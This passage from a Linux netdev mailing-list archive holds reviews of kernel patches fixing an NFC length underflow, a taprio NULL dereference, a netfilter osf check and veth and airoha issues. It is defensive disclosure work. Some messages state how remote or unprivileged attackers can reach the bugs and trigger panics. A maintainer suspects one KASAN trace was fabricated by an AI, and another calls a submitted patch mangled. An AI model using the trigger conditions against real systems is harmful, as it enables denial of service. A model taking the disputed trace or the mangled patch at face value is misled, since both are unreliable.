device is later brought up again, airoha_dev_open() sees atomic_fetch_inc()
return 0 (old value) and calls airoha_qdma_start_napi() -> napi_enable(),
which hits BUG_ON(!test_bit(NAPI_STATE_SCHED, &val)) in napi_enable_locked()
because the NAPI was never disabled.
The early return also skips the netdev_tx_reset_subqueue() calls at the end
of the function.
Should the code either continue with cleanup on timeout (don't return), or
ensure NAPI and DMA state are properly cleaned up before returning?
> +
> + airoha_qdma_stop_napi(qdma);
> airoha_qdma_clear(qdma, REG_QDMA_GLOBAL_CFG,
> GLOBAL_CFG_TX_DMA_EN_MASK |
> GLOBAL_CFG_RX_DMA_EN_MASK);
[ ... ]
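The "continue with cleanup on timeout" option raised above can be sketched in user space. This is only a model under stated assumptions, not the airoha driver: `struct fake_qdma`, `wait_tx_idle()`, `fake_dev_stop()`, `fake_dev_open()` and `POLL_BUDGET` are hypothetical names, and the busy counter stands in for polling GLOBAL_CFG_TX_DMA_BUSY_MASK.

```c
#include <errno.h>
#include <stdbool.h>

/* Hypothetical model of the shared QDMA state; not the driver's structs. */
struct fake_qdma {
	int users;          /* ports currently using the engine */
	bool napi_enabled;  /* models the NAPI enable state */
	bool dma_enabled;   /* models the TX/RX DMA enable bits */
	int busy_polls;     /* number of polls for which TX DMA stays busy */
};

#define POLL_BUDGET 100 /* hypothetical stand-in for the 100 ms timeout */

/* Poll until the engine reports idle or the budget is exhausted. */
int wait_tx_idle(struct fake_qdma *q)
{
	int i;

	for (i = 0; i < POLL_BUDGET; i++) {
		if (q->busy_polls == 0)
			return 0;
		q->busy_polls--;
	}
	return -ETIMEDOUT;
}

/* Stop path: a timeout is remembered, but teardown always completes. */
int fake_dev_stop(struct fake_qdma *q)
{
	int err = 0;

	if (--q->users == 0) {
		err = wait_tx_idle(q);   /* do not return early here */
		q->napi_enabled = false; /* models airoha_qdma_stop_napi() */
		q->dma_enabled = false;  /* models clearing the DMA enable bits */
	}
	return err;
}

/* Open path: enabling an already enabled NAPI models the BUG_ON case. */
int fake_dev_open(struct fake_qdma *q)
{
	if (q->users++ == 0) {
		if (q->napi_enabled)
			return -EBUSY;
		q->napi_enabled = true;
		q->dma_enabled = true;
	}
	return 0;
}
```

In this model a stop that times out still leaves NAPI and DMA disabled, so a later open succeeds. Whether the real driver should report the timeout or swallow it is a separate decision for the patch author.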
* Re: [PATCH net v2 1/3] nfc: nci: fix u8 underflow in nci_store_general_bytes_nfc_dep
From: Simon Horman @ 2026-04-14 8:28 UTC (permalink / raw)
To: Lekë Hapçiu
Cc: netdev, davem, edumazet, kuba, pabeni, linux-nfc, stable,
Lekë Hapçiu
In-Reply-To: <20260409185958.1821242-2-snowwlake@icloud.com>
On Thu, Apr 09, 2026 at 08:59:56PM +0200, Lekë Hapçiu wrote:
> From: Lekë Hapçiu <framemain@outlook.com>
>
> nci_store_general_bytes_nfc_dep() computes the number of General Bytes
> to copy from an ATR_RES or ATR_REQ frame by subtracting a fixed header
> offset from the peer-supplied length field:
>
> ndev->remote_gb_len = min_t(__u8,
> (atr_res_len - NFC_ATR_RES_GT_OFFSET), /* offset = 15 */
> NFC_ATR_RES_GB_MAXSIZE);
>
> Both length fields are __u8. When a malicious NFC-DEP target (POLL mode)
> or initiator (LISTEN mode) sends an ATR_RES/ATR_REQ whose length field is
> smaller than the fixed offset (< 15 or < 14 respectively), the subtraction
> wraps in unsigned u8 arithmetic:
>
> e.g. atr_res_len = 0 -> (u8)(0 - 15) = 241
>
> min_t(__u8, 241, 47) then yields 47, so the subsequent memcpy reads
> 47 bytes from beyond the end of the valid activation parameter data into
> ndev->remote_gb[]. This buffer is later passed to nfc_llcp_parse_gb_tlv()
> as a TLV array, feeding directly into the TLV parser hardened by the
> companion patch.
>
> Fix: add an explicit lower-bound check on each length field before the
> subtraction. If the length is smaller than the required offset the frame
> is malformed; leave remote_gb_len at zero and skip the memcpy.
>
> Both the POLL (atr_res_len / NFC_ATR_RES_GT_OFFSET = 15) and the LISTEN
> (atr_req_len / NFC_ATR_REQ_GT_OFFSET = 14) paths are affected; both are
> fixed symmetrically.
>
> Reachability: the ATR_RES is sent by an NFC-DEP target during RF
> activation, before any authentication or pairing. The bug is therefore
> reachable from any NFC peer within ~4 cm.
>
> Fixes: a99903ec4566 ("NFC: NCI: Handle Target mode activation")
The above commit seems to move rather than add the logic in question.
It seems to me that the following would be the fixes tag corresponding
to the commit that introduced this problem.
Fixes: 767f19ae698e ("NFC: Implement NCI dep_link_up and dep_link_down")
> Cc: stable@vger.kernel.org
> Signed-off-by: Lekë Hapçiu <framemain@outlook.com>
> ---
> net/nfc/nci/ntf.c | 22 ++++++++++++++--------
> 1 file changed, 14 insertions(+), 8 deletions(-)
>
> diff --git a/net/nfc/nci/ntf.c b/net/nfc/nci/ntf.c
> index c96512bb8..8eb295580 100644
> --- a/net/nfc/nci/ntf.c
> +++ b/net/nfc/nci/ntf.c
> @@ -631,25 +631,31 @@ static int nci_store_general_bytes_nfc_dep(struct nci_dev *ndev,
> switch (ntf->activation_rf_tech_and_mode) {
> case NCI_NFC_A_PASSIVE_POLL_MODE:
> case NCI_NFC_F_PASSIVE_POLL_MODE:
> + if (ntf->activation_params.poll_nfc_dep.atr_res_len <
> + NFC_ATR_RES_GT_OFFSET)
> + break;
> ndev->remote_gb_len = min_t(__u8,
> - (ntf->activation_params.poll_nfc_dep.atr_res_len
> - - NFC_ATR_RES_GT_OFFSET),
> + ntf->activation_params.poll_nfc_dep.atr_res_len
> + - NFC_ATR_RES_GT_OFFSET,
> NFC_ATR_RES_GB_MAXSIZE);
I'm not suggesting changing this, at least not as part of this bug fix, so
this comment is FTR: As NFC_ATR_RES_GB_MAXSIZE is a compile time constant,
and the condition added by this patch ensures that the result of the
subtraction is not negative, I strongly suspect that using min() here is
sufficient and thus more appropriate than min_t().
> memcpy(ndev->remote_gb,
> - (ntf->activation_params.poll_nfc_dep.atr_res
> - + NFC_ATR_RES_GT_OFFSET),
> + ntf->activation_params.poll_nfc_dep.atr_res
> + + NFC_ATR_RES_GT_OFFSET,
> ndev->remote_gb_len);
> break;
>
> case NCI_NFC_A_PASSIVE_LISTEN_MODE:
> case NCI_NFC_F_PASSIVE_LISTEN_MODE:
> + if (ntf->activation_params.listen_nfc_dep.atr_req_len <
> + NFC_ATR_REQ_GT_OFFSET)
> + break;
> ndev->remote_gb_len = min_t(__u8,
> - (ntf->activation_params.listen_nfc_dep.atr_req_len
> - - NFC_ATR_REQ_GT_OFFSET),
> + ntf->activation_params.listen_nfc_dep.atr_req_len
> + - NFC_ATR_REQ_GT_OFFSET,
> NFC_ATR_REQ_GB_MAXSIZE);
> memcpy(ndev->remote_gb,
> - (ntf->activation_params.listen_nfc_dep.atr_req
> - + NFC_ATR_REQ_GT_OFFSET),
> + ntf->activation_params.listen_nfc_dep.atr_req
> + + NFC_ATR_REQ_GT_OFFSET,
> ndev->remote_gb_len);
> break;
>
> --
> 2.51.0
>
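The wrap-around described in the quoted commit message can be reproduced in user space. The following is a minimal sketch, not the NCI code: `gb_len_unchecked()` and `gb_len_checked()` are hypothetical helpers, and the constants 15 and 47 are taken from the values quoted in the commit message.

```c
#include <stdint.h>

#define ATR_RES_GT_OFFSET  15 /* mirrors NFC_ATR_RES_GT_OFFSET */
#define ATR_RES_GB_MAXSIZE 47 /* mirrors NFC_ATR_RES_GB_MAXSIZE */

/* Models min_t(__u8, len - offset, max) without a lower-bound check. */
uint8_t gb_len_unchecked(uint8_t atr_res_len)
{
	/* The cast truncates modulo 256, so 0 - 15 becomes 241. */
	uint8_t diff = (uint8_t)(atr_res_len - ATR_RES_GT_OFFSET);

	return diff < ATR_RES_GB_MAXSIZE ? diff : ATR_RES_GB_MAXSIZE;
}

/* Same computation with the lower-bound check the patch adds. */
uint8_t gb_len_checked(uint8_t atr_res_len)
{
	uint8_t diff;

	if (atr_res_len < ATR_RES_GT_OFFSET)
		return 0; /* malformed frame: copy nothing */

	diff = (uint8_t)(atr_res_len - ATR_RES_GT_OFFSET);
	return diff < ATR_RES_GB_MAXSIZE ? diff : ATR_RES_GB_MAXSIZE;
}
```

With a length of 0 the unchecked helper yields 47 while the checked one yields 0; for lengths of 15 or more both agree.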
* Re: [PATCH net v2] net/sched: taprio: fix NULL pointer dereference in class dump
From: Weiming Shi @ 2026-04-14 8:28 UTC (permalink / raw)
To: Paolo Abeni
Cc: Vinicius Costa Gomes, Jamal Hadi Salim, Jiri Pirko,
David S . Miller, Eric Dumazet, Jakub Kicinski, Simon Horman,
Vladimir Oltean, netdev, linux-kernel, Xiang Mei
In-Reply-To: <6f4ebd09-9fa9-4b6e-97b5-a6b1fcec8774@redhat.com>
On 26-04-14 10:16, Paolo Abeni wrote:
> On 4/10/26 5:39 PM, Weiming Shi wrote:
> > When a TAPRIO child qdisc is deleted via RTM_DELQDISC, taprio_graft()
> > is called with new == NULL and stores NULL into q->qdiscs[cl - 1].
> > Subsequent RTM_GETTCLASS dump operations walk all classes via
> > taprio_walk() and call taprio_dump_class(), which calls taprio_leaf()
> > returning the NULL pointer, then dereferences it to read child->handle,
> > causing a kernel NULL pointer dereference.
> >
> > The bug is reachable with namespace-scoped CAP_NET_ADMIN on any kernel
> > with CONFIG_NET_SCH_TAPRIO enabled. On systems with unprivileged user
> > namespaces enabled, an unprivileged local user can trigger a kernel
> > panic by creating a taprio qdisc inside a new network namespace,
> > grafting an explicit child qdisc, deleting it, and requesting a class
> > dump. The RTM_GETTCLASS dump itself requires no capability.
> >
> > Oops: general protection fault, probably for non-canonical address 0xdffffc0000000007: 0000 [#1] SMP KASAN NOPTI
> > KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]
> > RIP: 0010:taprio_dump_class (net/sched/sch_taprio.c:2475)
> > Call Trace:
> > <TASK>
> > tc_fill_tclass (net/sched/sch_api.c:1966)
> > qdisc_class_dump (net/sched/sch_api.c:2329)
> > taprio_walk (net/sched/sch_taprio.c:2510)
> > tc_dump_tclass_qdisc (net/sched/sch_api.c:2353)
> > tc_dump_tclass_root (net/sched/sch_api.c:2370)
> > tc_dump_tclass (net/sched/sch_api.c:2431)
> > rtnl_dumpit (net/core/rtnetlink.c:6827)
> > netlink_dump (net/netlink/af_netlink.c:2325)
> > rtnetlink_rcv_msg (net/core/rtnetlink.c:6927)
> > netlink_rcv_skb (net/netlink/af_netlink.c:2550)
> > </TASK>
> >
> > Fix this by substituting &noop_qdisc when new is NULL in
> > taprio_graft(), following the same pattern used by multiq_graft() and
> > prio_graft(). This ensures q->qdiscs[] slots are never NULL, making
> > control-plane dump paths safe without requiring individual NULL checks.
> >
> > Also update the data-plane NULL guards in taprio_enqueue() and
> > taprio_dequeue_from_txq() to check for &noop_qdisc, so that packets
> > are still dropped cleanly without inflating qlen/backlog counters.
> >
> > Fixes: 665338b2a7a0 ("net/sched: taprio: dump class stats for the actual q->qdiscs[]")
> > Reported-by: Xiang Mei <xmei5@asu.edu>
> > Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> > ---
> > v2:
> > - Update NULL checks in taprio_enqueue() and taprio_dequeue_from_txq()
> > to test for &noop_qdisc instead of NULL, preventing qlen/backlog
> > counter inflation when noop_qdisc drops packets (Sashiko)
> > ---
> > net/sched/sch_taprio.c | 11 +++++++----
> > 1 file changed, 7 insertions(+), 4 deletions(-)
> >
> > diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
> > index f721c03514f60..XXXXXXXXX 100644
> > --- a/net/sched/sch_taprio.c
> > +++ b/net/sched/sch_taprio.c
> > @@ -634,7 +634,7 @@ static int taprio_enqueue(struct sk_buff *skb, struct Qdisc *sch,
> >
> > child = q->qdiscs[queue];
> > - if (unlikely(!child))
> > + if (unlikely(child == &noop_qdisc))
> > return qdisc_drop(skb, sch, to_free);
> >
> > if (taprio_skb_exceeds_queue_max_sdu(sch, skb)) {
> > @@ -717,7 +717,7 @@ static struct sk_buff *taprio_dequeue_from_txq(struct Qdisc *sch, int txq,
> > int prio;
> > int len;
> > u8 tc;
> >
> > - if (unlikely(!child))
> > + if (unlikely(child == &noop_qdisc))
> > return NULL;
> >
> > if (TXTIME_ASSIST_IS_ENABLED(q->flags))
> > @@ -2183,6 +2183,9 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> > if (!dev_queue)
> > return -EINVAL;
> >
> > + if (!new)
> > + new = &noop_qdisc;
> > +
> > if (dev->flags & IFF_UP)
> > dev_deactivate(dev);
> >
> > @@ -2196,14 +2199,14 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> > *old = q->qdiscs[cl - 1];
> > if (FULL_OFFLOAD_IS_ENABLED(q->flags)) {
> > WARN_ON_ONCE(dev_graft_qdisc(dev_queue, new) != *old);
> > - if (new)
> > + if (new != &noop_qdisc)
> > qdisc_refcount_inc(new);
> > if (*old)
> > qdisc_put(*old);
> > }
> >
> > q->qdiscs[cl - 1] = new;
> > - if (new)
> > + if (new != &noop_qdisc)
> > new->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
> >
> > if (dev->flags & IFF_UP)
> > --
> > 2.43.0
>
> Does not apply cleanly to net and looks seriously mangled. I suspect the
> above chunks should be part of the actual patch ?!?
>
> Please, whatever tool you are using to help craft the patch, double
> check the result manually before the actual submission.
>
> /P
>
Hi,
Sorry about the broken v2. I'll double-check everything carefully and
resend as v3.
Thanks,
Weiming
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Pablo Neira Ayuso @ 2026-04-14 8:22 UTC (permalink / raw)
To: Kito Xu (veritas501)
Cc: Florian Westphal, Phil Sutter, David S. Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, Simon Horman,
Fernando Fernandez Mancera, netfilter-devel, coreteam, netdev,
linux-kernel
In-Reply-To: <20260414074556.2512750-1-hxzene@gmail.com>
Hi,
On Tue, Apr 14, 2026 at 03:45:56PM +0800, Kito Xu (veritas501) wrote:
> nf_osf_ttl() calls __in_dev_get_rcu(skb->dev) and passes the result
> to in_dev_for_each_ifa_rcu() without checking for NULL. When the
> receiving device has no IPv4 configuration (ip_ptr is NULL),
> __in_dev_get_rcu() returns NULL and in_dev_for_each_ifa_rcu()
> dereferences it unconditionally, causing a kernel crash.
How could skb->dev be NULL !?
This is run from prerouting, input and forward.
> This can happen when a packet arrives on a device that has had its
> IPv4 configuration removed (e.g., MTU set below IPV4_MIN_MTU causing
> inetdev_destroy) or on a device that was never assigned an IPv4
> address, while an xt_osf or nft_osf rule with TTL_LESS mode is
> active and the packet TTL exceeds the fingerprint TTL.
>
> Add a NULL check for in_dev before the iteration. When in_dev is
> NULL, return 0 (no match) since source-address locality cannot be
> determined without IPv4 addresses on the device.
>
> KASAN: null-ptr-deref in range
> [0x0000000000000010-0x0000000000000017]
> RIP: 0010:nf_osf_match_one+0x204/0xa70
I cannot believe this. I think an AI is mocking up this KASAN splat; if
that is the case, I am sorry to say it, but it is too bad that you are
doing this.
> Call Trace:
> <IRQ>
> nf_osf_match+0x2f8/0x780
> xt_osf_match_packet+0x11c/0x1f0
> ipt_do_table+0x7fe/0x12b0
> nf_hook_slow+0xac/0x1e0
> ip_rcv+0x123/0x370
> __netif_receive_skb_one_core+0x166/0x1b0
> process_backlog+0x197/0x590
> __napi_poll+0xa1/0x540
> net_rx_action+0x401/0xd80
> handle_softirqs+0x19f/0x610
> </IRQ>
>
> Fixes: a218dc82f0b5 ("netfilter: nft_osf: Add ttl option support")
> Signed-off-by: Kito Xu (veritas501) <hxzene@gmail.com>
> ---
> net/netfilter/nfnetlink_osf.c | 3 +++
> 1 file changed, 3 insertions(+)
>
> diff --git a/net/netfilter/nfnetlink_osf.c b/net/netfilter/nfnetlink_osf.c
> index d64ce21c7b55..85dbd47dbbd4 100644
> --- a/net/netfilter/nfnetlink_osf.c
> +++ b/net/netfilter/nfnetlink_osf.c
> @@ -43,6 +43,9 @@ static inline int nf_osf_ttl(const struct sk_buff *skb,
> else if (ip->ttl <= f_ttl)
> return 1;
>
> + if (!in_dev)
> + return 0;
> +
> in_dev_for_each_ifa_rcu(ifa, in_dev) {
> if (inet_ifa_match(ip->saddr, ifa)) {
> ret = (ip->ttl == f_ttl);
> --
> 2.43.0
>
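For reference, the control flow around the proposed check, as far as it is visible in the quoted hunk, can be modelled in user space. This is a sketch under stated assumptions: `struct fake_ifa`, `struct fake_in_dev` and `fake_osf_ttl_less()` are hypothetical, and only the part of nf_osf_ttl() shown in the hunk is modelled. It says nothing about whether in_dev can really be NULL on these hooks, which is the open question above.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-ins for in_ifaddr and in_device. */
struct fake_ifa {
	uint32_t addr;
	uint32_t mask;
	struct fake_ifa *next;
};

struct fake_in_dev {
	struct fake_ifa *ifa_list;
};

/* Models the tail of nf_osf_ttl() shown in the hunk, with the NULL check. */
int fake_osf_ttl_less(const struct fake_in_dev *in_dev, uint32_t saddr,
		      uint8_t ttl, uint8_t f_ttl)
{
	const struct fake_ifa *ifa;

	if (ttl <= f_ttl)
		return 1;

	/* The check the patch adds: no IPv4 state, so report no match. */
	if (!in_dev)
		return 0;

	for (ifa = in_dev->ifa_list; ifa; ifa = ifa->next) {
		/* Same subnet test as inet_ifa_match(). */
		if (((saddr ^ ifa->addr) & ifa->mask) == 0)
			return ttl == f_ttl;
	}
	return 0;
}
```

Without the `!in_dev` test, the loop initializer would read `in_dev->ifa_list` through a NULL pointer in this model.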
* Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: Aleksandr Nogikh @ 2026-04-14 8:17 UTC (permalink / raw)
To: syzbot+cib904ea9ebb647254, hawk; +Cc: netdev, linux-kernel, syzkaller-bugs
In-Reply-To: <69dd48c2.a00a0220.468cb.004e.GAE@google.com>
Hmm, just fixed a problem that may have affected `syz test` processing,
let's try again:
#syz test
---
drivers/net/veth.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/veth.c b/drivers/net/veth.c
index 911e7e36e166..9d7b085c9548 100644
--- a/drivers/net/veth.c
+++ b/drivers/net/veth.c
@@ -1138,7 +1138,9 @@ static void veth_napi_del_range(struct net_device *dev, int start, int end)
*/
peer = rtnl_dereference(priv->peer);
if (peer) {
- for (i = start; i < end; i++)
+ int peer_end = min(end, (int)peer->real_num_tx_queues);
+
+ for (i = start; i < peer_end; i++)
netdev_tx_reset_queue(netdev_get_tx_queue(peer, i));
}
* Re: [PATCH net v2] net/sched: taprio: fix NULL pointer dereference in class dump
From: Paolo Abeni @ 2026-04-14 8:16 UTC (permalink / raw)
To: Weiming Shi, Vinicius Costa Gomes, Jamal Hadi Salim, Jiri Pirko,
David S . Miller, Eric Dumazet, Jakub Kicinski
Cc: Simon Horman, Vladimir Oltean, netdev, linux-kernel, Xiang Mei
In-Reply-To: <20260410153902.955227-2-bestswngs@gmail.com>
On 4/10/26 5:39 PM, Weiming Shi wrote:
> When a TAPRIO child qdisc is deleted via RTM_DELQDISC, taprio_graft()
> is called with new == NULL and stores NULL into q->qdiscs[cl - 1].
> Subsequent RTM_GETTCLASS dump operations walk all classes via
> taprio_walk() and call taprio_dump_class(), which calls taprio_leaf()
> returning the NULL pointer, then dereferences it to read child->handle,
> causing a kernel NULL pointer dereference.
>
> The bug is reachable with namespace-scoped CAP_NET_ADMIN on any kernel
> with CONFIG_NET_SCH_TAPRIO enabled. On systems with unprivileged user
> namespaces enabled, an unprivileged local user can trigger a kernel
> panic by creating a taprio qdisc inside a new network namespace,
> grafting an explicit child qdisc, deleting it, and requesting a class
> dump. The RTM_GETTCLASS dump itself requires no capability.
>
> Oops: general protection fault, probably for non-canonical address 0xdffffc0000000007: 0000 [#1] SMP KASAN NOPTI
> KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]
> RIP: 0010:taprio_dump_class (net/sched/sch_taprio.c:2475)
> Call Trace:
> <TASK>
> tc_fill_tclass (net/sched/sch_api.c:1966)
> qdisc_class_dump (net/sched/sch_api.c:2329)
> taprio_walk (net/sched/sch_taprio.c:2510)
> tc_dump_tclass_qdisc (net/sched/sch_api.c:2353)
> tc_dump_tclass_root (net/sched/sch_api.c:2370)
> tc_dump_tclass (net/sched/sch_api.c:2431)
> rtnl_dumpit (net/core/rtnetlink.c:6827)
> netlink_dump (net/netlink/af_netlink.c:2325)
> rtnetlink_rcv_msg (net/core/rtnetlink.c:6927)
> netlink_rcv_skb (net/netlink/af_netlink.c:2550)
> </TASK>
>
> Fix this by substituting &noop_qdisc when new is NULL in
> taprio_graft(), following the same pattern used by multiq_graft() and
> prio_graft(). This ensures q->qdiscs[] slots are never NULL, making
> control-plane dump paths safe without requiring individual NULL checks.
>
> Also update the data-plane NULL guards in taprio_enqueue() and
> taprio_dequeue_from_txq() to check for &noop_qdisc, so that packets
> are still dropped cleanly without inflating qlen/backlog counters.
>
> Fixes: 665338b2a7a0 ("net/sched: taprio: dump class stats for the actual q->qdiscs[]")
> Reported-by: Xiang Mei <xmei5@asu.edu>
> Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> ---
> v2:
> - Update NULL checks in taprio_enqueue() and taprio_dequeue_from_txq()
> to test for &noop_qdisc instead of NULL, preventing qlen/backlog
> counter inflation when noop_qdisc drops packets (Sashiko)
> ---
> net/sched/sch_taprio.c | 11 +++++++----
> 1 file changed, 7 insertions(+), 4 deletions(-)
>
> diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
> index f721c03514f60..XXXXXXXXX 100644
> --- a/net/sched/sch_taprio.c
> +++ b/net/sched/sch_taprio.c
> @@ -634,7 +634,7 @@ static int taprio_enqueue(struct sk_buff *skb, struct Qdisc *sch,
>
> child = q->qdiscs[queue];
> - if (unlikely(!child))
> + if (unlikely(child == &noop_qdisc))
> return qdisc_drop(skb, sch, to_free);
>
> if (taprio_skb_exceeds_queue_max_sdu(sch, skb)) {
> @@ -717,7 +717,7 @@ static struct sk_buff *taprio_dequeue_from_txq(struct Qdisc *sch, int txq,
> int prio;
> int len;
> u8 tc;
>
> - if (unlikely(!child))
> + if (unlikely(child == &noop_qdisc))
> return NULL;
>
> if (TXTIME_ASSIST_IS_ENABLED(q->flags))
> @@ -2183,6 +2183,9 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> if (!dev_queue)
> return -EINVAL;
>
> + if (!new)
> + new = &noop_qdisc;
> +
> if (dev->flags & IFF_UP)
> dev_deactivate(dev);
>
> @@ -2196,14 +2199,14 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> *old = q->qdiscs[cl - 1];
> if (FULL_OFFLOAD_IS_ENABLED(q->flags)) {
> WARN_ON_ONCE(dev_graft_qdisc(dev_queue, new) != *old);
> - if (new)
> + if (new != &noop_qdisc)
> qdisc_refcount_inc(new);
> if (*old)
> qdisc_put(*old);
> }
>
> q->qdiscs[cl - 1] = new;
> - if (new)
> + if (new != &noop_qdisc)
> new->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
>
> if (dev->flags & IFF_UP)
> --
> 2.43.0
Does not apply cleanly to net and looks seriously mangled. I suspect the
above chunks should be part of the actual patch ?!?
Please, whatever tool you are using to help craft the patch, double
check the result manually before the actual submission.
/P
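Independent of the formatting problem, the sentinel idea in the quoted commit message (store &noop_qdisc instead of NULL) can be sketched in user space. This is a minimal model, not the taprio code: `struct fake_qdisc`, `fake_noop`, `fake_graft()`, `fake_dump_class()` and `fake_enqueue_drops()` are hypothetical names.

```c
#include <stddef.h>

#define NUM_QUEUES 4

struct fake_qdisc {
	unsigned int handle;
};

/* Shared sentinel, modelling noop_qdisc. */
struct fake_qdisc fake_noop = { .handle = 0 };

struct fake_sched {
	struct fake_qdisc *children[NUM_QUEUES];
};

/* Every slot starts out pointing at the sentinel, never at NULL. */
void fake_init(struct fake_sched *s)
{
	size_t i;

	for (i = 0; i < NUM_QUEUES; i++)
		s->children[i] = &fake_noop;
}

/* Graft: a NULL child means "delete"; the sentinel is stored instead. */
struct fake_qdisc *fake_graft(struct fake_sched *s, unsigned int cl,
			      struct fake_qdisc *new_child)
{
	struct fake_qdisc *old;

	if (cl == 0 || cl > NUM_QUEUES)
		return NULL;
	if (!new_child)
		new_child = &fake_noop;

	old = s->children[cl - 1];
	s->children[cl - 1] = new_child;
	return old;
}

/* Dump path: may dereference the slot without a NULL check. */
unsigned int fake_dump_class(const struct fake_sched *s, unsigned int cl)
{
	if (cl == 0 || cl > NUM_QUEUES)
		return 0;
	return s->children[cl - 1]->handle;
}

/* Data path: the sentinel is treated as "no child", so the packet drops. */
int fake_enqueue_drops(const struct fake_sched *s, unsigned int queue)
{
	return s->children[queue] == &fake_noop;
}
```

The trade-off is the one the commit message names: dump paths need no per-call NULL checks, while the data path has to compare against the sentinel explicitly.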
* Re: [PATCH net 0/3] nfc: llcp: fix OOB reads in TLV parsers and PDU handlers
From: Paolo Abeni @ 2026-04-14 8:11 UTC (permalink / raw)
To: Lekë Hapçiu, netdev; +Cc: linux-nfc, stable, davem, edumazet, kuba
In-Reply-To: <20260409233517.1891497-1-snowwlake@icloud.com>
On 4/10/26 1:35 AM, Lekë Hapçiu wrote:
> This series fixes three out-of-bounds read vulnerabilities in the NFC
> LLCP layer, all reachable from RF without prior pairing or session
> establishment.
>
> Patch 1 adds missing TLV length bounds checks in nfc_llcp_parse_gb_tlv()
> and nfc_llcp_parse_connection_tlv() — a crafted CONNECT or SNL PDU
> containing a short TLV value field can read beyond the skb tail.
>
> Patch 2 fixes nfc_llcp_recv_snl(), which accessed TLV fields and
> performed arithmetic on an uncapped length byte before any bounds
> check, enabling a 1-byte heap OOB read and a u8 wrap-around.
>
> Patch 3 fixes nfc_llcp_recv_dm(), which read the DM reason byte at
> skb->data[2] without verifying the frame is at least 3 bytes long.
> A 2-byte DM PDU (header only) from a rogue peer triggers a 1-byte
> OOB heap read.
>
> All three bugs are independently triggered via RF (AV:A, AC:L, no
> authentication required).
This series looks like an older iteration of:
https://patchwork.kernel.org/user/todo/netdevbpf/?series=1079400
but it reached the ML 2h afterwards?!?
At the very best you have some serious setup issue. Please have a look at
the repost policy and especially at the 24h grace period:
https://elixir.bootlin.com/linux/v7.0/source/Documentation/process/maintainer-netdev.rst
And, given the above problem, please do not share any more patches for
at least 48h.
/P